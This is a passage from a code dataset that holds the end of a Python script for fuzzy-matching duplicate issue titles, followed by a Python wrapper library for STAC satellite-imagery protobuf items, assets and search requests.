'ansible']\n\n if len(apts) > 1:\n DUPES.append((title, matches))\n import epdb; epdb.st()\n'''\n\n'''\nDUPES = []\ntitles = sorted(set([x.strip() for x in titles]))\ntest_hits = [x for x in hits]\ntest_titles = sorted(set([x['_source']['title'] for x in test_hits]))\ntest_titles = sorted(set([x.strip() for x in test_titles]))\n\nwhile titles:\n total = len(titles)\n for idx,title in enumerate(titles):\n print idx,total\n titles.remove(title)\n\n matches = []\n\n for itx,tx in enumerate(test_titles):\n if tx == title:\n continue\n ratio = fuzz.ratio(title,tx)\n\n if ratio > 75:\n matches.append(tx)\n #import epdb; epdb.st()\n\n if matches:\n\n # reduce the list\n for x in matches:\n test_titles.remove(x)\n if x in titles:\n titles.remove(x)\n\n DUPES.append((title,matches))\n pprint((title,matches))\n break\n #import epdb; epdb.st()\n\nopen('/tmp/test.json', 'wb').write(json.dumps(DUPES, indent=2))\nimport epdb; epdb.st()\n'''\n\nwith open('/tmp/dupes.json', 'rb') as f:\n DUPES = json.loads(f.read())\n\nall_dupes = []\ndhits = [x for x in hits]\nfor dupe in DUPES:\n\n dtitles = dupe[1] + [dupe[0]]\n dtitles = sorted(set(dtitles))\n\n hdupes = []\n for x in dhits:\n if x['_source']['title'].strip() in dtitles:\n hdupes.append(x)\n dhits.remove(x)\n if hdupes:\n\n hstates = sorted(set([x['_source']['state'] for x in hdupes]))\n if hstates != ['closed']:\n all_dupes.append(hdupes)\n #import epdb; epdb.st()\n\nopen('/tmp/fuzzy_dupes.json', 'wb').write(json.dumps(all_dupes, indent=2))\nimport epdb; epdb.st()\n","sub_path":"test_title_matcher.py","file_name":"test_title_matcher.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32549492","text":"import pathlib\nimport re\nfrom copy import deepcopy\n\nimport boto3\nimport botocore.exceptions\n\nfrom datetime import 
date, datetime, timezone\nfrom typing import Union, Iterator, List, Optional, Tuple, Dict\n\nfrom epl.protobuf.v1.geometry_pb2 import ProjectionData\nfrom google.protobuf.any_pb2 import Any\nfrom google.protobuf.wrappers_pb2 import FloatValue\nfrom epl.geometry import BaseGeometry, Polygon\nfrom typing.io import BinaryIO, IO\n\nfrom nsl.stac import StacItem, StacRequest, View, ViewRequest, \\\n Mosaic, MosaicRequest, Eo, EoRequest, EnvelopeData, FloatFilter, Asset, enum, utils\nfrom nsl.stac.client import NSLClient\nfrom nsl.stac import stac_service as stac_singleton\n\n\ndef _set_properties(stac_data, properties, type_url_prefix):\n \"\"\"\n pack properties and then set the properties member value to the input.\n :param stac_data:\n :param properties:\n :param type_url_prefix:\n :return:\n \"\"\"\n if properties is None:\n return\n\n # pack the properties into an Any field\n packed_properties = Any()\n packed_properties.Pack(properties,\n type_url_prefix=type_url_prefix + properties.DESCRIPTOR.full_name)\n\n # overwrite the previous properties field with this updated version\n stac_data.properties.CopyFrom(packed_properties)\n properties = properties\n return stac_data, properties\n\n\ndef _check_assets_exist(stac_item: StacItem, b_raise=True) -> List[str]:\n results = []\n for asset_key in stac_item.assets:\n asset = stac_item.assets[asset_key]\n b_file_exists = _check_asset_exists(asset)\n\n if not b_file_exists and b_raise:\n raise ValueError(\"get_blob_metadata returns false for asset key {}\".format(asset_key))\n results.append(asset_key)\n return results\n\n\ndef _check_asset_exists(asset: Asset) -> bool:\n if asset.cloud_platform == enum.CloudPlatform.GCP:\n return utils.get_blob_metadata(bucket=asset.bucket, blob_name=asset.object_path) is not None\n elif asset.cloud_platform == enum.CloudPlatform.AWS:\n return _check_aws_asset_exists(asset)\n else:\n raise ValueError(\"cloud platform {0} of asset {1} not supported\"\n .format(enum.CloudPlatform(asset.cloud_platform).name, asset))\n\n\ndef _check_aws_asset_exists(asset: Asset) -> bool:\n s3 = boto3.client('s3')\n\n try:\n s3.head_object(Bucket=asset.bucket, Key=asset.object_path, RequestPayer='requester')\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n else:\n raise e\n return True\n\n\nclass AssetWrap(object):\n def __init__(self,\n asset: Asset = None,\n bucket: str = None,\n object_path: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n href=\"\",\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n bucket_manager: str = \"\",\n bucket_region: str = \"\",\n key_suffix: str = \"\",\n asset_key: str = \"\"):\n self._asset_key = asset_key\n if asset is None:\n asset = Asset(href=href,\n eo_bands=eo_bands,\n asset_type=asset_type,\n cloud_platform=cloud_platform,\n bucket_manager=bucket_manager,\n bucket_region=bucket_region,\n bucket=bucket,\n object_path=object_path)\n\n self._asset = asset\n\n if self._asset.bucket is None or self._asset.object_path is None:\n raise ValueError(\"bucket and object path must be set in valid asset\")\n\n self._ext = pathlib.Path(self._asset.object_path).suffix\n\n b_thumbnail_png = self._asset.asset_type == enum.AssetType.THUMBNAIL and self._ext == '.png'\n _, href_type = self._asset_type_details(asset_type=self._asset.asset_type, b_thumbnail_png=b_thumbnail_png)\n self._asset.type = href_type\n self._type = href_type\n self._key_suffix 
= key_suffix\n\n def __eq__(self, other):\n if not isinstance(other, AssetWrap):\n return False\n\n if self.asset_key != other.asset_key:\n return False\n\n return self.equals_pb(other._asset)\n\n def __str__(self):\n return str(\"{0}extension: {1}\\nasset_key: {2}\".format(self._asset, self._ext, self.asset_key))\n\n def __copy__(self):\n pass\n\n def __deepcopy__(self, memo):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k == '_asset':\n value = Asset()\n value.CopyFrom(v)\n setattr(result, k, value)\n else:\n setattr(result, k, deepcopy(v))\n return result\n\n def _asset_key_prefix(self) -> str:\n if self.eo_bands == enum.Band.UNKNOWN_BAND:\n return \"{0}_{1}\".format(self.asset_type.name, self.cloud_platform.name)\n return \"{0}_{1}_{2}\".format(self.asset_type.name, self.eo_bands.name, self.cloud_platform.name)\n\n @property\n def asset(self) -> Asset:\n return self._asset\n\n @property\n def asset_key(self) -> str:\n if self._asset_key:\n return self._asset_key\n\n asset_key = self._asset_key_prefix()\n if self._key_suffix:\n asset_key += \"_{}\".format(self._key_suffix)\n return asset_key\n\n @property\n def asset_key_suffix(self) -> str:\n return self._key_suffix\n\n @asset_key_suffix.setter\n def asset_key_suffix(self, value: str):\n self._key_suffix = value\n\n @property\n def asset_type(self) -> enum.AssetType:\n \"\"\"\ntype of asset\n :return:\n \"\"\"\n return enum.AssetType(self._asset.asset_type)\n\n @property\n def bucket(self) -> str:\n \"\"\"\nbucket where data stored. may be private\n :return:\n \"\"\"\n return self._asset.bucket\n\n @property\n def bucket_manager(self) -> str:\n return self._asset.bucket_manager\n\n @property\n def bucket_region(self) -> str:\n return self._asset.bucket_region\n\n @property\n def cloud_platform(self) -> enum.CloudPlatform:\n \"\"\"\ncloud platform where data stored. Google Cloud, AWS and Azure are current options (or unknown)\n :return:\n \"\"\"\n return enum.CloudPlatform(self._asset.cloud_platform)\n\n @cloud_platform.setter\n def cloud_platform(self, value: enum.CloudPlatform):\n self._asset.cloud_platform = value\n\n @property\n def eo_bands(self) -> enum.Band:\n \"\"\"\nelectro optical bands included in data. 
if data is not electro optical, then this is set to Unknown\n :return:\n \"\"\"\n return enum.Band(self._asset.eo_bands)\n\n @property\n def ext(self) -> str:\n return self._ext\n\n @property\n def href(self) -> str:\n \"\"\"\nthe href for downloading data\n :return:\n \"\"\"\n return self._asset.href\n\n @href.setter\n def href(self, value: str):\n self._asset.href = value\n\n @property\n def object_path(self) -> str:\n \"\"\"\nthe object path to use with the bucket if access is available\n :return:\n \"\"\"\n return self._asset.object_path\n\n @object_path.setter\n def object_path(self, value: str):\n self._asset.object_path = value\n\n @property\n def type(self) -> str:\n return self._type\n\n def equals_pb(self, other: Asset):\n \"\"\"\ndoes the AssetWrap equal a protobuf Asset\n :param other:\n :return:\n \"\"\"\n return self._asset.SerializeToString() == other.SerializeToString()\n\n def exists(self) -> bool:\n return _check_asset_exists(self._asset)\n\n def download(self,\n from_bucket: bool = False,\n file_obj: IO[Union[Union[str, bytes], Any]] = None,\n save_filename: str = '',\n save_directory: str = '',\n requester_pays: bool = False,\n nsl_id: str = None) -> str:\n return utils.download_asset(asset=self._asset,\n from_bucket=from_bucket,\n file_obj=file_obj,\n save_filename=save_filename,\n save_directory=save_directory,\n requester_pays=requester_pays,\n nsl_id=nsl_id)\n\n @staticmethod\n def _asset_type_details(asset_type: enum.AssetType, b_thumbnail_png: bool = True) -> (str, str):\n \"\"\"\nfor asset type and bool, get the extension and href type\n :param asset_type:\n :param b_thumbnail_png:\n :return: str extension, str href type\n \"\"\"\n # TODO finish asset_type map\n ext = \"tif\"\n if asset_type == enum.AssetType.TIFF:\n href_type = \"image/tiff\"\n elif asset_type == enum.AssetType.GEOTIFF:\n href_type = \"image/vnd.stac.geotiff\"\n elif asset_type == enum.AssetType.CO_GEOTIFF:\n href_type = \"image/vnd.stac.geotiff; cloud-optimized=true\"\n elif (asset_type == enum.AssetType.THUMBNAIL and b_thumbnail_png) or asset_type == enum.AssetType.PNG:\n href_type = \"image/png\"\n ext = \"png\"\n elif (asset_type == enum.AssetType.THUMBNAIL and not b_thumbnail_png) or asset_type == enum.AssetType.JPEG:\n href_type = \"image/jpeg\"\n ext = \"jpg\"\n elif asset_type == enum.AssetType.JPEG_2000:\n href_type = \"image/jp2\"\n ext = \"jp2\"\n elif asset_type == enum.AssetType.MRF_XML:\n href_type = \"application/xml\"\n ext = \"xml\"\n else:\n href_type = \"application/octet-stream\"\n ext = \"bin\"\n\n return ext, href_type\n\n\nclass _BaseWrap:\n def __init__(self, stac_data, properties_func, type_url_prefix=\"nearspacelabs.com/proto/\"):\n \"\"\"\n Whether it's a stac_request or a stac_item, allow for the repack_properties method to work\n :param stac_data:\n :param properties_func:\n \"\"\"\n self._stac_data = stac_data\n self.properties = None\n self._properties_func = properties_func\n self._type_url_prefix = type_url_prefix\n\n if stac_data is not None and stac_data.HasField(\"properties\") and properties_func is not None:\n self.properties = properties_func()\n self._stac_data.properties.Unpack(self.properties)\n elif properties_func is not None:\n self.properties = properties_func()\n self._set_properties(self.properties)\n\n def __str__(self):\n return str(self._stac_data)\n\n def _set_properties(self, properties):\n self._stac_data, self.properties = _set_properties(self._stac_data, properties, self._type_url_prefix)\n\n def _get_field(self, metadata_key: str, key: 
str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(self.properties, metadata_key), key)\n return None\n\n def _get_wrapped_field(self, metadata_key: str, key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(self.properties, metadata_key), key), \"value\")\n return None\n\n def _set_internal_sub_object(self, metadata_key: str):\n pass\n\n def _set_field(self, metadata_key: str, key: str, value):\n self._set_internal_sub_object(metadata_key)\n setattr(getattr(self.properties, metadata_key), key, value)\n\n def _set_obj(self, metadata_key: str, key: str, value):\n self._set_internal_sub_object(metadata_key)\n getattr(getattr(self.properties, metadata_key), key).CopyFrom(value)\n\n def _set_nested_obj(self, metadata_key: str, object_key: str, value_key: str, value):\n self._set_internal_sub_object(metadata_key)\n getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key).CopyFrom(value)\n\n def _set_nested_field(self, metadata_key: str, object_key: str, value_key: str, value):\n setattr(getattr(getattr(self.properties, metadata_key), object_key), value_key, value)\n\n def _get_nested_field(self, metadata_key: str, object_key: str, value_key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key)\n return None\n\n def _get_nested_wrapped_field(self, metadata_key: str, object_key: str, value_key: str):\n if self.properties.HasField(metadata_key):\n return getattr(getattr(getattr(getattr(self.properties, metadata_key), object_key), value_key), \"value\")\n return None\n\n\nclass StacItemWrap(_BaseWrap):\n \"\"\"\nWrapper for StacItem protobuf\n \"\"\"\n\n def __eq__(self, other):\n if not isinstance(other, StacItemWrap):\n return False\n\n return self.equals_pb(other.stac_item)\n\n def __init__(self, stac_item: StacItem = None, properties_constructor=None):\n self._assets = {}\n if stac_item is None:\n stac_data = StacItem()\n else:\n stac_data = StacItem()\n stac_data.CopyFrom(stac_item)\n\n for asset_key in stac_data.assets:\n self._assets[asset_key] = AssetWrap(stac_data.assets[asset_key], asset_key=asset_key)\n\n super().__init__(stac_data, properties_constructor)\n if self.created is None:\n self.created = datetime.now(tz=timezone.utc)\n\n def __copy__(self):\n pass\n\n def __deepcopy__(self, memo):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k == '_stac_data':\n value = StacItem()\n value.CopyFrom(v)\n setattr(result, k, value)\n else:\n setattr(result, k, deepcopy(v))\n return result\n\n @property\n def bbox(self) -> EnvelopeData:\n \"\"\"\nbounding box of data. 
In form of EnvelopeData\n :return:\n \"\"\"\n return self.stac_item.bbox\n\n @property\n def cloud_cover(self) -> Optional[float]:\n \"\"\"\nget cloud cover value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"eo\") and self.stac_item.eo.HasField(\"cloud_cover\"):\n return self.stac_item.eo.cloud_cover.value\n return None\n\n @cloud_cover.setter\n def cloud_cover(self, value: float):\n if not self.stac_item.HasField(\"eo\"):\n self.stac_item.eo.CopyFrom(Eo(cloud_cover=FloatValue(value=value)))\n else:\n self.stac_item.eo.cloud_cover.CopyFrom(FloatValue(value=value))\n\n @property\n def collection(self) -> str:\n \"\"\"\nthe collection id for the stac item\n :return:\n \"\"\"\n return self.stac_item.collection\n\n @collection.setter\n def collection(self, value: str):\n self.stac_item.collection = value\n\n @property\n def constellation(self) -> enum.Constellation:\n \"\"\"\nthe enum describing the constellation\n :return:\n \"\"\"\n return enum.Constellation(self.stac_item.constellation_enum)\n\n @constellation.setter\n def constellation(self, value: enum.Constellation):\n self.stac_item.constellation_enum = value\n self.stac_item.constellation = self.constellation.name\n\n @property\n def created(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"created\"):\n return datetime.fromtimestamp(self.stac_item.created.seconds, tz=timezone.utc)\n else:\n return None\n\n @created.setter\n def created(self, value: Union[datetime, date]):\n self.stac_item.created.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def end_observed(self) -> Optional[datetime]:\n return self.stac_item.end_observed\n\n @end_observed.setter\n def end_observed(self, value: Union[datetime, date]):\n self.stac_item.end_observation.CopyFrom(utils.pb_timestamp(d_utc=value))\n self.stac_item.end_datetime.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def feature(self):\n \"\"\"\ngeojson feature with geometry being only aspect defined\n :return:\n \"\"\"\n return {\n 'type': 'Feature',\n 'geometry': self.geometry.__geo_interface__,\n 'id': self.id,\n 'collection': self.collection,\n 'properties': self._feature_properties(),\n 'assets': self._feature_assets()\n }\n\n @staticmethod\n def _append_prop(props: Dict, prop_name: str, prop_value):\n if prop_value is None:\n return props\n if props is None:\n props = {}\n props[prop_name] = prop_value\n return props\n\n def _feature_properties(self) -> Dict:\n props = {}\n props = StacItemWrap._append_prop(props, 'datetime', self.observed.replace(microsecond=0).isoformat())\n props = StacItemWrap._append_prop(props, 'observed', self.observed.replace(microsecond=0).isoformat())\n props = StacItemWrap._append_prop(props, 'mission', self.mission.name)\n props = StacItemWrap._append_prop(props, 'platform', self.platform.name)\n props = StacItemWrap._append_prop(props, 'instrument', self.instrument.name)\n props = StacItemWrap._append_prop(props, 'gsd', self.gsd)\n props = StacItemWrap._append_prop(props, 'eo:cloud_cover', self.cloud_cover)\n props = StacItemWrap._append_prop(props, 'view:off_nadir', self.off_nadir)\n return props\n\n def _feature_assets(self) -> Dict:\n feature_assets = {}\n for asset_wrap in self.get_assets():\n feature_assets[asset_wrap.asset_key] = {\n 'href': asset_wrap.href,\n 'type': asset_wrap.type,\n }\n return feature_assets\n\n @property\n def geometry(self) -> BaseGeometry:\n if self.stac_item.HasField(\"geometry\"):\n return BaseGeometry.import_protobuf(self.stac_item.geometry)\n elif 
self.stac_item.HasField(\"bbox\"):\n return Polygon.from_envelope_data(self.stac_item.bbox)\n\n @geometry.setter\n def geometry(self, value: BaseGeometry):\n self.stac_item.geometry.CopyFrom(value.geometry_data)\n self.stac_item.bbox.CopyFrom(value.envelope_data)\n\n @property\n def gsd(self) -> Optional[float]:\n \"\"\"\n get cloud cover value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"gsd\"):\n return self.stac_item.gsd.value\n return None\n\n @gsd.setter\n def gsd(self, value: float):\n self.stac_item.gsd.CopyFrom(FloatValue(value=value))\n\n @property\n def id(self) -> str:\n return self.stac_item.id\n\n @id.setter\n def id(self, value: str):\n self.stac_item.id = value\n\n @property\n def instrument(self) -> enum.Instrument:\n return enum.Instrument(self.stac_item.instrument_enum)\n\n @instrument.setter\n def instrument(self, value: enum.Instrument):\n self.stac_item.instrument_enum = value\n self.stac_item.instrument = self.instrument.name\n\n @property\n def mission(self) -> enum.Mission:\n return enum.Mission(self.stac_item.mission_enum)\n\n @mission.setter\n def mission(self, value: enum.Mission):\n self.stac_item.mission_enum = value\n self.stac_item.mission = self.mission.name\n\n @property\n def mosaic_name(self) -> Optional[str]:\n if self.stac_item.HasField(\"mosaic\"):\n return self.stac_item.mosaic.name\n return None\n\n @mosaic_name.setter\n def mosaic_name(self, name: str):\n if not self.stac_item.HasField(\"mosaic\"):\n self.stac_item.mosaic.CopyFrom(Mosaic(name=name))\n else:\n self.stac_item.mosaic.name = name\n\n @property\n def mosaic_quad_key(self) -> Optional[str]:\n \"\"\"\nIf the STAC item is a quad from a mosaic, then it has a quad key that defines the boundaries of the quad. The quad tree\ndefinition is assumed to be the convention defined by Google Maps, based off of there Pseudo-Web Mercator projection.\n\nAn example quad key is '02313012030231'. Quads use 2-bit tile interleaved addresses. 
The first character defines the\nlargest quadrant (in this case 0 is upper left), the next character ('2') is the upper right quadrant of that first\nquadrant, the 3rd character ('3') is the lower left quadrant of the previous quadrant and so on.\n\nFor more details on the quad tree tiling for maps use `openstreetmaps docs\n`\n :return:\n \"\"\"\n if self.stac_item.HasField(\"mosaic\"):\n return self.stac_item.mosaic.quad_key\n return None\n\n @mosaic_quad_key.setter\n def mosaic_quad_key(self, quad_key: str):\n if not self.stac_item.HasField(\"mosaic\"):\n self.stac_item.mosaic.CopyFrom(Mosaic(quad_key=quad_key))\n else:\n self.stac_item.mosaic.quad_key = quad_key\n\n @property\n def observed(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"datetime\"):\n return datetime.fromtimestamp(self.stac_item.datetime.seconds, tz=timezone.utc)\n elif self.stac_item.HasField(\"observed\"):\n return datetime.fromtimestamp(self.stac_item.observed.seconds, tz=timezone.utc)\n else:\n return None\n\n @observed.setter\n def observed(self, value: Union[datetime, date]):\n self.stac_item.datetime.CopyFrom(utils.pb_timestamp(d_utc=value))\n self.stac_item.observed.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n @property\n def off_nadir(self) -> Optional[float]:\n \"\"\"\n get view off_nadir value\n :return: float or None\n \"\"\"\n if self.stac_item.HasField(\"view\") and self.stac_item.view.HasField(\"off_nadir\"):\n return self.stac_item.view.off_nadir.value\n return None\n\n @off_nadir.setter\n def off_nadir(self, value: float):\n if not self.stac_item.HasField(\"view\"):\n self.stac_item.view.CopyFrom(View(off_nadir=FloatValue(value=value)))\n else:\n self.stac_item.view.off_nadir.CopyFrom(FloatValue(value=value))\n\n @property\n def platform(self) -> enum.Platform:\n return enum.Platform(self.stac_item.platform_enum)\n\n @platform.setter\n def platform(self, value: enum.Platform):\n self.stac_item.platform_enum = value\n self.stac_item.platform = self.platform.name\n\n @property\n def provenance_ids(self) -> List[str]:\n \"\"\"\nThe stac_ids that went into creating the current mosaic. They are in the array in the order in which they were used in\nthe mosaic\n :return:\n \"\"\"\n return self.stac_item.mosaic.provenance_ids\n\n @property\n def proj(self) -> ProjectionData:\n \"\"\"\nThe projection for all assets of this STAC item. 
If an Asset has its own proj definition,\nthen that supersedes this projection definition.\n :return: projection information\n \"\"\"\n return self.stac_item.proj\n\n @proj.setter\n def proj(self, value: ProjectionData):\n self.stac_item.proj.CopyFrom(value)\n\n @property\n def stac_item(self) -> StacItem:\n \"\"\"\n get stac_item\n :return: StacItem\n \"\"\"\n return self._stac_data\n\n @property\n def updated(self) -> Optional[datetime]:\n if self.stac_item.HasField(\"updated\"):\n return datetime.fromtimestamp(self.stac_item.updated.seconds, tz=timezone.utc)\n else:\n return None\n\n @updated.setter\n def updated(self, value: Union[datetime, date]):\n self.stac_item.updated.CopyFrom(utils.pb_timestamp(d_utc=value))\n\n def download_asset(self,\n asset_key: str = \"\",\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.GCP,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n asset_key_regex: str = None,\n from_bucket: bool = False,\n file_obj: BinaryIO = None,\n save_filename: str = \"\",\n save_directory: str = \"\") -> str:\n # get_asset expects a dict mapping attribute names to regex patterns; the\n # special key 'asset_key' is matched against each asset's key in get_assets\n asset_wrap = self.get_asset(asset_key=asset_key,\n asset_type=asset_type,\n cloud_platform=cloud_platform,\n eo_bands=eo_bands,\n asset_regex={'asset_key': asset_key_regex} if asset_key_regex else None)\n\n return asset_wrap.download(from_bucket=from_bucket,\n file_obj=file_obj,\n save_filename=save_filename,\n save_directory=save_directory)\n\n def equals_pb(self, other: StacItem):\n \"\"\"\ndoes the StacItemWrap equal a protobuf StacItem\n :param other:\n :return:\n \"\"\"\n return self.stac_item.SerializeToString() == other.SerializeToString()\n\n @staticmethod\n def _asset_types_match(desired_type: enum.AssetType, asset_type: enum.AssetType,\n b_relaxed_types: bool = False) -> bool:\n if not b_relaxed_types:\n return desired_type == asset_type\n elif desired_type == enum.AssetType.TIFF:\n return asset_type == desired_type or \\\n asset_type == enum.AssetType.GEOTIFF or \\\n asset_type == enum.AssetType.CO_GEOTIFF\n elif desired_type == enum.AssetType.GEOTIFF:\n return asset_type == desired_type or asset_type == enum.AssetType.CO_GEOTIFF\n return asset_type == desired_type\n\n def get_assets(self,\n asset_key: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n asset_regex: Dict = None,\n b_relaxed_types: bool = False) -> List[AssetWrap]:\n if asset_key is not None and asset_key in self._assets:\n return [self._assets[asset_key]]\n elif asset_key is not None and asset_key and asset_key not in self._assets:\n raise ValueError(\"asset_key {} not found\".format(asset_key))\n\n results = []\n for asset_key in self._assets:\n current = self._assets[asset_key]\n b_asset_type_match = self._asset_types_match(desired_type=asset_type,\n asset_type=current.asset_type,\n b_relaxed_types=b_relaxed_types)\n if (eo_bands is not None and eo_bands != enum.Band.UNKNOWN_BAND) and current.eo_bands != eo_bands:\n continue\n if (cloud_platform is not None and cloud_platform != enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM) and \\\n current.cloud_platform != cloud_platform:\n continue\n if (asset_type is not None and asset_type != enum.AssetType.UNKNOWN_ASSET) and not b_asset_type_match:\n continue\n if asset_regex is not None and len(asset_regex) > 0:\n b_continue = False\n for key, regex_value in asset_regex.items():\n if key == 'asset_key':\n if not re.match(regex_value, asset_key):\n b_continue = True\n 
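# added note: a single failed regex match disqualifies this asset from the results\n 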
break\n else:\n if not hasattr(current, key):\n raise AttributeError(\"no key {0} in asset {1}\".format(key, current))\n elif not re.match(regex_value, getattr(current, key)):\n b_continue = True\n break\n\n if b_continue:\n continue\n\n # check that asset hasn't changed between protobuf and asset_map\n pb_asset = self.stac_item.assets[asset_key]\n if not current.equals_pb(pb_asset):\n raise ValueError(\"corrupted protobuf. Asset and AssetWrap have differing underlying protobuf\")\n\n results.append(current)\n return results\n\n def get_asset(self,\n asset_key: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n asset_regex: Dict = None,\n b_relaxed_types: bool = False) -> Optional[AssetWrap]:\n results = self.get_assets(asset_key, asset_type, cloud_platform, eo_bands, asset_regex, b_relaxed_types)\n if len(results) > 1:\n raise ValueError(\"must be more specific in selecting your asset. if all enums are used, try using \"\n \"asset_regex\")\n elif len(results) == 1:\n return results[0]\n return None\n\n def check_assets_exist(self, b_raise) -> List[str]:\n return _check_assets_exist(self.stac_item, b_raise=b_raise)\n\n\nclass StacRequestWrap(_BaseWrap):\n def __init__(self, stac_request: StacRequest = None, properties_constructor=None, id: str = \"\"):\n if stac_request is None:\n stac_request = StacRequest(id=id)\n\n super().__init__(stac_request, properties_constructor)\n\n @property\n def bbox(self) -> EnvelopeData:\n if self.stac_request.HasField(\"bbox\"):\n return self.stac_request.bbox\n elif self.stac_request.HasField(\"intersects\"):\n return self.intersects.envelope_data\n return None\n\n @bbox.setter\n def bbox(self, value: EnvelopeData):\n # this tests the spatial reference (it would be better to have a dedicated method)\n value = Polygon.from_envelope_data(envelope_data=value).envelope_data\n self.stac_request.bbox.CopyFrom(value)\n self.stac_request.ClearField(\"intersects\")\n\n @property\n def collection(self) -> str:\n return self.stac_request.collection\n\n @collection.setter\n def collection(self, value: str):\n self.stac_request.collection = value\n\n @property\n def constellation(self) -> enum.Constellation:\n return enum.Constellation(self.stac_request.constellation_enum)\n\n @constellation.setter\n def constellation(self, value: enum.Constellation):\n self.stac_request.constellation_enum = value\n\n @property\n def id(self) -> str:\n return self.stac_request.id\n\n @id.setter\n def id(self, value: str):\n self.stac_request.id = value\n\n @property\n def instrument(self) -> enum.Instrument:\n return enum.Instrument(self.stac_request.instrument_enum)\n\n @instrument.setter\n def instrument(self, value: enum.Instrument):\n self.stac_request.instrument_enum = value\n\n @property\n def intersects(self) -> Optional[BaseGeometry]:\n if self.stac_request.HasField(\"intersects\"):\n return BaseGeometry.import_protobuf(self.stac_request.intersects)\n elif self.stac_request.HasField(\"bbox\"):\n return Polygon.from_envelope_data(self.bbox)\n return None\n\n @intersects.setter\n def intersects(self, geometry: BaseGeometry):\n self.stac_request.intersects.CopyFrom(geometry.geometry_data)\n self.stac_request.ClearField(\"bbox\")\n\n @property\n def limit(self) -> int:\n return self.stac_request.limit\n\n @limit.setter\n def limit(self, value: int):\n self.stac_request.limit = value\n\n @property\n def mission(self) -> enum.Mission:\n 
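# maps the request's stored mission_enum back onto the shared enum type\n 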
return enum.Mission(self.stac_request.mission_enum)\n\n @mission.setter\n def mission(self, value: enum.Mission):\n self.stac_request.mission_enum = value\n\n @property\n def mosaic_name(self) -> Optional[str]:\n if self.stac_request.HasField(\"mosaic\"):\n return self.stac_request.mosaic.name\n return None\n\n @mosaic_name.setter\n def mosaic_name(self, value: str):\n if not self.stac_request.HasField(\"mosaic\"):\n self.stac_request.mosaic.CopyFrom(MosaicRequest(name=value))\n else:\n self.stac_request.mosaic.name = value\n\n @property\n def mosaic_quad_key(self) -> Optional[str]:\n \"\"\"\nOverview of :func:`~StacItemWrap.mosaic_quad_key`\n\nThe quad_key to search for mosaic quad STAC items by. If a quad STAC item exists with the key '02313012030231' and this\n'mosaic_quad_key' is set to the key of a smaller internal quad, like '02313012030231300', '02313012030231301',\n'023130120302313', etc, then the aforementioned '02313012030231' STAC item will be returned.\n\nIf a 'mosaic_quad_key' is set to a larger quad, like '02313012030', then the '02313012030231' quad STAC item and many\nother quad STAC items that are contained by '02313012030' are returned.\n :return:\n \"\"\"\n if self.stac_request.HasField(\"mosaic\"):\n return self.stac_request.mosaic.quad_key\n return None\n\n @mosaic_quad_key.setter\n def mosaic_quad_key(self, value: str):\n if not self.stac_request.HasField(\"mosaic\"):\n self.stac_request.mosaic.CopyFrom(MosaicRequest(quad_key=value))\n else:\n self.stac_request.mosaic.quad_key = value\n\n @property\n def offset(self) -> int:\n return self.stac_request.offset\n\n @offset.setter\n def offset(self, value: int):\n self.stac_request.offset = value\n\n @property\n def platform(self) -> enum.Platform:\n return enum.Platform(self.stac_request.platform_enum)\n\n @platform.setter\n def platform(self, value: enum.Platform):\n self.stac_request.platform_enum = value\n\n @property\n def stac_request(self) -> StacRequest:\n return self._stac_data\n\n def set_bounds(self, bounds: Tuple[float, float, float, float], epsg: int = 0, proj4: str = \"\"):\n proj = ProjectionData(proj4=proj4)\n if epsg > 0:\n proj = ProjectionData(epsg=epsg)\n\n bbox = EnvelopeData(xmin=bounds[0], ymin=bounds[1], xmax=bounds[2], ymax=bounds[3], proj=proj)\n self.bbox = bbox\n\n def set_azimuth(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.azimuth.CopyFrom(float_filter)\n\n def set_off_nadir(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = enum.SortDirection.NOT_SORTED):\n if not self.stac_request.HasField(\"view\"):\n self.stac_request.view.CopyFrom(ViewRequest())\n\n float_filter = self._float_filter(rel_type, value, start, end, sort_direction)\n self.stac_request.view.off_nadir.CopyFrom(float_filter)\n\n def set_sun_azimuth(self,\n rel_type: enum.FilterRelationship,\n value: float,\n start: float = None,\n end: float = None,\n sort_direction: enum.SortDirection = 